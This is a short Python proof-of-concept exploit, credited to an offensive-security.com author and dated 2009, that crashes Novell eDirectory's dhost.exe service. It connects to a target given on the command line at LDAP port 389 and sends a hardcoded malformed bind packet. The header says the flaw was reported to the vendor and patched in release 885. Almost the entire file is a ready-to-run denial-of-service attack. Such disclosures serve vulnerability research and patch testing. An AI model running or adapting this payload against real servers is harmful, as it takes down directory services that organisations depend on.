#!/usr/bin/python
# 22/03/2009
# Novell eDirectory 883ftf3 nldap module DOS
# Matteo Memelli - offensive-security.com
# ryujin ___ @ ___ offensive-security.com
#
# A malformed bind LDAP packet can make dhost.exe service crashing.
# 24/03/2009 Vendor notification; patched in 885 release
#

import sys
from socket import *

payload = (
          "\x30\x7E\x02\x02\x01\x60\x77\x02\x84\xFF\xFF\xFF\xFF\x03\x04\x84"
          "\xFF\xFF\xFF\xFF\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61"
          "\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D"
          "\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68\x2C\x64"
          "\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e"
          "\x6e\x61\x63\x72\x61\x73\x68\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64"
          "\x63\x3D\x75\x61\x72\x65\x67\x6f\x6e\x6e\x61\x63\x72\x61\x73\x68"
          "\x2C\x64\x63\x3D\x63\x6F\x6D\x2B\x64\x63\x3D\x63\x6F\x6D\x80\x00"
          )

s = socket(AF_INET, SOCK_STREAM)
print 'connecting...'
s.connect((sys.argv[1], 389))
print 'sending payload...'
s.send(payload)
print s.recv(1024)
s.close()
print 'Done!'